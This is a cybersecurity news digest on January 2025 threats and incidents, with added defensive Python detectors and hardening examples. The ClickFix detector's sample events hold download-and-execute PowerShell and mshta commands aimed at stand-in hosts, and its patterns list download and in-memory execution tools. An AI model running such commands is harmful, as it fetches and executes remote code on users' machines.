What are the latest cybersecurity alerts, incidents, and news?
FBI, North Korean IT Workers, Steal Source Code, QakBot Malware, BackConnect Module, Steal System Data, Lumma Stealer, Fake CAPTCHA, ChatGPT, DDoS Attacks, J-Magic Campaign, Juniper Routers, Custom Backdoor, Phishing Attack, University of Texas at El Paso, Harrison County Schools, FalconFeedsio, Cryptocurrency Scams, Karnataka Bank, NEFT System, Ilem Group, Undersea Cables, Russian Spy Ship, PayPal, Cybersecurity Violations, US DOJ, Laptop Farm Scheme, Google, Identity Check, Android Security, Tesla Charger, Pwn2Own Automotive 2025.
Cyber Alerts
1. North Korean IT Workers Exploit Remote Jobs
The FBI has warned that North Korean IT workers are infiltrating companies through remote positions and then stealing source code and extorting their employers. The operatives conceal their identities during interviews with AI-assisted and face-swapping tools. Once hired, they copy company code repositories (on GitHub, for example) to their own profiles and personal cloud accounts, harvest credentials and session cookies, and use those cookies to log in from devices the company does not control, increasing the risk of intellectual property theft and follow-on intrusions. The FBI recommends least-privilege access, monitoring of network logs for unusual traffic and repository copying, and stricter identity verification in hiring.
2. QakBot Malware Enhances BackConnect Module
Researchers report that QakBot, a well-known malware loader, has returned with a new BackConnect (BC) module that gives operators remote access to and persistent control over infected hosts. Walmart's Cyber Intelligence team found the BC module being deployed alongside DarkVNC, a hidden-VNC remote access tool, and KeyHole, a VNC component previously associated with IcedID, giving the operators a foothold for data theft and ransomware deployment. The team also tied the infrastructure to recent updates in ZLoader, and assesses that the operators are likely supporting Black Basta ransomware intrusions with these tools.
3. Fake CAPTCHA Campaign Delivers Lumma Stealer
Researchers have flagged a malware campaign that uses fake CAPTCHA verification pages to deliver the Lumma information stealer. Victims in Argentina, Colombia, the United States, the Philippines and elsewhere have been hit across healthcare, banking, marketing, and telecom. The chain begins when a victim is redirected to a fraudulent CAPTCHA page that instructs them to "prove they are human" by pasting and running a command (the ClickFix technique); that command fetches and executes the Lumma payload, so the user, not an exploit, performs the initial execution.
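Because the user runs the command by hand, the detectable event is an interpreter launched from the desktop shell with a download-and-execute command line. The following Python detector is an added example, not code from the Lumma report or any vendor: it scores constructed process-creation events whose field names mimic Sysmon Event ID 1 (Image, ParentImage, CommandLine, User). The interpreter list, the indicator regexes, their weights and the threshold are heuristics chosen here, not the campaign's indicators.

```python
# Added example, not from the Lumma/fake-CAPTCHA report. A small detector for the
# "paste this command to prove you are human" step, run over constructed
# process-creation events. Field names mimic Sysmon Event ID 1 (Image,
# ParentImage, CommandLine, User) but are simplified; the indicator patterns and
# weights are heuristics chosen for this example, not the campaign's IoCs.
import re

# Interpreters a fake CAPTCHA page typically asks the user to launch via Win+R.
LOLBIN_IMAGES = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}
# A parent of explorer.exe means the Run dialog or a double-click, i.e. the user
# did it, which is the defining trait of this lure (no exploit is involved).
# Launches from services, schedulers or Office need their own rules.
USER_PARENTS = {"explorer.exe"}
ALERT_THRESHOLD = 2

# (pattern, label, weight): fragments typical of a one-liner that fetches and runs a payload.
INDICATORS = [
    (re.compile(r"-w(?:i(?:n(?:dowstyle)?)?)?\s+hidden", re.I), "hidden window", 1),
    (re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command", 2),
    (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|downloadstring)\b", re.I), "web download", 1),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "in-memory execution", 1),
    (re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I), "mshta remote script", 2),
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return an alert dict for a suspicious user-launched interpreter, else None."""
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    if image not in LOLBIN_IMAGES or parent not in USER_PARENTS:
        return None
    hits = [(label, w) for rx, label, w in INDICATORS if rx.search(ev["CommandLine"])]
    score = sum(w for _, w in hits)
    if score < ALERT_THRESHOLD:        # a lone "iwr" is normal admin activity
        return None
    return {"user": ev["User"], "image": image, "score": score,
            "reasons": [label for label, _ in hits]}


def detect(events):
    return [a for a in (score_event(e) for e in events) if a]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"User": "CORP\\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://captcha-check.example/verify)"'},
    {"User": "CORP\\bob", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "Get-Process | Sort-Object CPU"'},
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc SQBFAFgAIAAoAGkAcgBtACAAaAB0AHQAcAA6AC8ALwA="},
    {"User": "CORP\\carol", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://verify-human.example/c.hta"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Of the four constructed events only the first (hidden window plus download plus in-memory execution) and the fourth (mshta pulling a remote HTA) cross the threshold; the plain admin command is ignored, and the SYSTEM-launched event is deliberately out of scope for this rule. In a real deployment the Explorer-parent filter can be loosened to include browsers and the Run dialog's RunMRU registry writes, and the weights tuned against the environment's baseline of legitimate PowerShell use.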
4. ChatGPT Flaw Could Enable DDoS Attacks
A security researcher has reported a vulnerability in an OpenAI ChatGPT API endpoint that could be abused to launch distributed denial-of-service (DDoS) attacks against third-party sites. The endpoint accepts a list of links in a single HTTP POST request and fetches every one of them, without deduplication or a cap on the list size, so an attacker can submit thousands of links pointing at the same victim and have OpenAI's infrastructure generate the flood on their behalf. The researcher recommended deduplicating the list, capping the number of URLs per request, and adding rate limiting to prevent abuse.
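The mitigations above are easy to state and easy to get slightly wrong, so here is an added Python example (not OpenAI's code) that puts the vulnerable handler shape next to a hardened one. It assumes a hypothetical endpoint that takes a list of URLs and fetches each; the outbound HTTP client is replaced by a counter so the example runs offline, and the limits are illustrative.

```python
# Added example, not OpenAI's code. Shows why an endpoint that fetches every
# caller-supplied URL becomes a DDoS amplifier, and one way to harden it.
# Assumptions: the endpoint takes a list of URLs; outbound HTTP is replaced by
# FetchCounter so nothing leaves the machine. Limits are illustrative.
import time
from collections import Counter, defaultdict
from urllib.parse import urlsplit


class FetchCounter:
    """Stand-in for the outbound HTTP client: counts requests per host."""

    def __init__(self):
        self.per_host = Counter()

    def fetch(self, url):
        self.per_host[urlsplit(url).hostname] += 1

    def total(self):
        return sum(self.per_host.values())


def handle_unhardened(urls, client):
    """The vulnerable shape: every entry is fetched, duplicates included.
    Returns the number of outbound requests generated."""
    for u in urls:
        client.fetch(u)
    return client.total()


MAX_URLS = 10          # per request, after deduplication
MAX_PER_HOST = 2       # a batch should not hammer a single site
RATE_LIMIT = 20        # outbound fetches per client per window
WINDOW_S = 60


class HardenedHandler:
    def __init__(self, client, clock=time.monotonic):
        self.client = client
        self.clock = clock
        self.history = defaultdict(list)   # client_id -> fetch timestamps

    def _spend(self, client_id, n):
        """Sliding-window rate limit on fetches charged to this caller."""
        now = self.clock()
        recent = [t for t in self.history[client_id] if now - t < WINDOW_S]
        if len(recent) + n > RATE_LIMIT:
            return False
        recent.extend([now] * n)
        self.history[client_id] = recent
        return True

    def handle(self, client_id, urls):
        # 1. Keep only http(s) URLs and deduplicate (fragment ignored, order kept).
        seen, clean = set(), []
        for u in urls:
            parts = urlsplit(u)
            if parts.scheme not in ("http", "https") or not parts.hostname:
                continue
            key = parts._replace(fragment="").geturl()
            if key not in seen:
                seen.add(key)
                clean.append(key)
        # 2. Cap the total size of the batch.
        if len(clean) > MAX_URLS:
            return {"status": 400, "reason": "too many urls", "fetched": 0}
        # 3. Cap how many entries may point at the same host.
        per_host = Counter(urlsplit(u).hostname for u in clean)
        if any(n > MAX_PER_HOST for n in per_host.values()):
            return {"status": 400, "reason": "too many urls for one host", "fetched": 0}
        # 4. Charge the fetches to the caller's rate-limit budget before sending.
        if not self._spend(client_id, len(clean)):
            return {"status": 429, "reason": "rate limited", "fetched": 0}
        for u in clean:
            self.client.fetch(u)
        return {"status": 200, "reason": "ok", "fetched": len(clean)}


if __name__ == "__main__":
    flood = ["https://victim.example/?%d" % i for i in range(5000)]
    print("unhardened:", handle_unhardened(flood, FetchCounter()), "requests to victim")
    print("hardened:  ", HardenedHandler(FetchCounter()).handle("attacker", flood))
```

The ordering matters: deduplicate first so that a list of identical links costs one fetch, reject on the count and the per-host ceiling before any request leaves, and only then debit the caller's rate-limit budget. Cache-busting query strings defeat deduplication, which is why the per-host cap is needed as well. A production fetcher also needs an SSRF check that refuses private and link-local destinations, which this example leaves out.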
5. J-magic Campaign Targets Juniper Routers
The J-magic campaign targets Juniper Networks enterprise-grade routers with a custom backdoor that steals data and drops additional payloads. According to Lumen Technologies' Black Lotus Labs, the implant passively watches TCP traffic for a specially crafted "magic packet"; when one arrives, it challenges the sender and, on a correct response, opens a reverse shell to the attacker, handing over control of the router. Infections were observed at organizations in the semiconductor, energy, and IT sectors across South America, Europe, and Asia, and many of the affected devices were serving as VPN gateways.
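A passive implant of this kind leaves little on the wire until it is triggered, but the trigger sequence itself is visible in flow data: an inbound packet to a port the router does not serve, followed within seconds by a TCP session the router itself initiates. The Python below is an added example and not Lumen's detection logic; it applies that heuristic to constructed NetFlow-style records. The router addresses, the service allowlist, the management-host allowlist and the flow records are all assumptions made for the example.

```python
# Added example, not Lumen's detection logic. A flow-level heuristic for the
# behaviour described above: a router should never *initiate* TCP sessions to
# arbitrary peers, and a session that follows an inbound packet to a port the
# router does not serve looks like a magic-packet trigger. Router addresses,
# the allowlists and the flow records are constructed for the example.
ROUTERS = {"203.0.113.1", "203.0.113.2"}       # router interface addresses (assumed)
ROUTER_SERVICES = {22, 443, 830}                # ports the routers legitimately listen on (assumed)
MGMT_HOSTS = {"198.51.100.10"}                  # peers a router may legitimately connect to (assumed)
TRIGGER_WINDOW_S = 30                           # how far back to look for a trigger packet


def is_initiation(flow):
    """SYN without ACK: the source is opening the connection."""
    return "S" in flow["flags"] and "A" not in flow["flags"]


def detect(flows):
    """Return alerts for router-originated TCP sessions, annotated with a
    preceding inbound packet from the same peer to a closed port if one exists."""
    flows = sorted(flows, key=lambda f: f["ts"])
    alerts = []
    for i, f in enumerate(flows):
        if f["src"] not in ROUTERS or not is_initiation(f) or f["dst"] in MGMT_HOSTS:
            continue
        reasons = ["router-originated TCP session to %s:%d" % (f["dst"], f["dport"])]
        # Look back for the trigger: the same peer sent something to a port we don't serve.
        for g in reversed(flows[:i]):
            if f["ts"] - g["ts"] > TRIGGER_WINDOW_S:
                break
            if g["src"] == f["dst"] and g["dst"] == f["src"] and g["dport"] not in ROUTER_SERVICES:
                reasons.append("preceded by inbound packet to closed port %d" % g["dport"])
                break
        alerts.append({"router": f["src"], "peer": f["dst"], "reasons": reasons})
    return alerts


# Constructed NetFlow-style records (ts in seconds, flags as TCP flag letters).
SAMPLE_FLOWS = [
    {"ts": 100, "src": "192.0.2.50", "sport": 40001, "dst": "203.0.113.1", "dport": 4444, "flags": "S"},
    {"ts": 105, "src": "203.0.113.1", "sport": 51000, "dst": "192.0.2.50", "dport": 443, "flags": "S"},
    {"ts": 200, "src": "203.0.113.2", "sport": 50000, "dst": "198.51.100.10", "dport": 514, "flags": "S"},
    {"ts": 300, "src": "198.51.100.10", "sport": 52222, "dst": "203.0.113.2", "dport": 22, "flags": "S"},
    {"ts": 400, "src": "203.0.113.2", "sport": 50002, "dst": "192.0.2.77", "dport": 80, "flags": "S"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_FLOWS):
        print(a)
```

On the sample data the first router's session to 192.0.2.50:443 is flagged with both reasons (it follows a packet to closed port 4444 from the same peer), the syslog session to the management host is allowed, the inbound SSH from the admin host is ignored because the router did not initiate it, and the second router's session to 192.0.2.77 is flagged on egress alone. Routers do legitimately originate sessions (syslog, RADIUS, NTP, NETCONF call-home), so MGMT_HOSTS must be populated from the real configuration or the rule will be noisy; conversely a trigger packet aimed at an open port will not produce the second reason, so the egress alert must stand on its own.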
Cyber Incidents
6. Phishing Attack Hit UTEP Students' Accounts
The University of Texas at El Paso (UTEP) has warned students about a phishing attack that compromised several student accounts. Fraudulent emails tricked students into entering their login credentials, which the attackers then used to change direct-deposit information and redirect funds. UTEP said its own systems were not breached; the university has opened an investigation, contacted law enforcement, and advised affected students to report the incident to the FBI's cybercrime unit.
7. Harrison County Schools Cyberattack Incident
The Harrison County Board of Education in West Virginia experienced a cybersecurity incident on January 18, 2025, involving unauthorized access to certain computer systems. The board opened an investigation and temporarily disabled the affected network to limit further damage. External cybersecurity experts have been engaged to assess the situation and secure the systems going forward.
8. FalconFeedsio X Account Hacked for Scams
FalconFeedsio's X account was compromised and used to promote fraudulent cryptocurrency posts and scam links. Although the account is known for publishing cybersecurity updates, which lends the posts unearned credibility, the attackers used it to push links to dubious crypto-related sites. Security researchers and users are warning others not to interact with links or posts coming from the compromised account.
9. Cyberattack Steals $280K from Karnataka Co-op Bank
A cyberattack on Karnataka's Bidar District Central Co-operative (BDCC) Bank exploited weaknesses in its RTGS/NEFT transaction system. The attackers altered beneficiary account details in the XML files used to submit transfers, diverting about $280,000 (₹2.34 crore) to 25 unauthorized accounts across northern India. The tampering surfaced only when customers reported unprocessed transactions, after which the bank suspended RTGS/NEFT services. An FIR has been filed under cybercrime laws and the investigation into the perpetrators is ongoing.
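An attacker who can rewrite beneficiary fields in a batch file between the core banking system and the payment gateway is defeated by making the file tamper-evident: the system that generates the batch signs the money-moving fields, and the gateway refuses to submit anything whose tag fails to verify. The Python below is an added example, not BDCC Bank's software or any real NEFT/RTGS format; the XML layout, the key and the batch contents are constructed for illustration.

```python
# Added example, not BDCC Bank's software. Tamper-evident handling of an outbound
# transfer batch: the core system signs the payment-relevant fields when it writes
# the file, and the gateway that submits to NEFT/RTGS refuses anything whose tag
# does not verify. The XML layout, key and batch are constructed for the example;
# real NEFT/RTGS message formats differ.
import hashlib
import hmac
import xml.etree.ElementTree as ET

KEY = b"constructed-demo-key"   # production: HSM/KMS-held, unreadable by the host that writes the files

BATCH = """<batch id="B-1001">
  <txn ref="T1"><amount>25000.00</amount><beneficiary>1234567890</beneficiary><ifsc>ABCD0001234</ifsc></txn>
  <txn ref="T2"><amount>75000.00</amount><beneficiary>9988776655</beneficiary><ifsc>WXYZ0009876</ifsc></txn>
</batch>"""


def canonical(xml_text):
    """Serialise only the fields that move money, in a fixed order, so cosmetic
    changes (whitespace, attribute order) do not break the tag but any edit to
    an amount, beneficiary or IFSC does."""
    root = ET.fromstring(xml_text)
    rows = []
    for txn in sorted(root.iter("txn"), key=lambda t: t.get("ref")):
        rows.append("|".join([root.get("id"), txn.get("ref"), txn.findtext("amount"),
                              txn.findtext("beneficiary"), txn.findtext("ifsc")]))
    return "\n".join(rows).encode()


def sign(xml_text, key=KEY):
    """HMAC-SHA256 over the canonical form, computed where the batch is generated."""
    return hmac.new(key, canonical(xml_text), hashlib.sha256).hexdigest()


def verify(xml_text, tag, key=KEY):
    """Constant-time comparison at the gateway; True only if no money-relevant field changed."""
    return hmac.compare_digest(sign(xml_text, key), tag)


def tamper(xml_text, ref, new_beneficiary):
    """Simulates the attack: rewrite one beneficiary account number in the file."""
    root = ET.fromstring(xml_text)
    for txn in root.iter("txn"):
        if txn.get("ref") == ref:
            txn.find("beneficiary").text = new_beneficiary
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    tag = sign(BATCH)
    print("original verifies:", verify(BATCH, tag))
    print("tampered verifies:", verify(tamper(BATCH, "T1", "1111111111"), tag))
```

Two design points carry the security value. The tag is computed over a canonical projection of the fields rather than the raw bytes, so a re-serialised but unchanged file still verifies while any edit to an amount, account or IFSC fails. And the key must not be readable by the process that writes the files or by anyone who can edit them, otherwise the attacker simply re-signs; signing at the core system and verifying at a separately administered gateway, with the tag reconciled against the ledger, is what turns the 25 diverted transfers into 25 rejected ones.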
10. Boost Cyberattack Disrupts Client Services
On Sunday, January 19, 2025, Boost, a subsidiary of Ilem Group, was hit by a targeted cyberattack accompanied by a ransom demand. The attack compromised company systems and disrupted services for about 15% of its more than 200 clients. The company's incident response teams restored more than 70% of the affected systems in under three days.
Cyber News
11. UK Investigates Undersea Cable Vulnerability
UK lawmakers are launching an inquiry into the vulnerability of undersea cables after the Russian spy ship Yantar was spotted mapping this critical infrastructure in British waters. The inquiry follows an incident in which a Royal Navy submarine surfaced near the Yantar to monitor its activities. It will examine the UK's ability to protect the cables, which carry the bulk of international data traffic, and assess the potential impact of a disruption to this infrastructure.
12. PayPal to Pay $2M for Cybersecurity Failures
PayPal will pay a $2 million penalty to New York State for violating the Department of Financial Services' (DFS) Cybersecurity Regulation. DFS found that PayPal failed to use qualified personnel for key cybersecurity functions and did not provide adequate training to address risks. As a result, a change that made tax forms available online exposed customers' full social security numbers in unredacted form, and attackers used credential-stuffing logins, which the accounts did not yet protect with multifactor authentication, to view them.
13. DOJ Indicts Americans in North Korea Scheme
The U.S. Justice Department has indicted five people, including two U.S. nationals, for running a laptop farm that let North Korean IT workers pose as remote employees of U.S. companies. Erick Ntekereze Prince and Emanuel Ashtor, together with North Korean nationals Jin Sung-Il and Pak Jin-Song and a fifth defendant, are accused of laundering the proceeds and hosting company-issued laptops at a U.S. residence so the North Koreans could access them remotely while appearing to work from inside the country. The scheme generated at least $866,000 for the Pyongyang government.
14. Google Launches Identity Check for Security
Google has rolled out Identity Check for Android, a feature that requires biometric authentication for sensitive actions whenever the device is outside a trusted location. It covers access to saved passwords and passkeys, changes to the screen lock, factory resets and similar settings, so a thief who has shoulder-surfed the PIN still cannot take over the device. Identity Check is currently available on Pixel phones running Android 15 and on Samsung Galaxy devices with One UI 7, as part of Google's ongoing theft-protection work.
15. Hackers Earn $129,500 for Tesla Charger Hacks
Researchers earned more than $700,000 over the first two days of Pwn2Own Automotive 2025, a large share of it for exploits against Tesla chargers. Day two alone brought in $335,500, including $129,500 for exploits of Tesla's Wall Connector. Several teams targeted the Tesla chargers with new exploit chains, while other entries relied on previously known bugs, which are rewarded at a reduced rate. More attempts were scheduled for the final day.
Copyright © 2025 CyberMaterial. All Rights Reserved.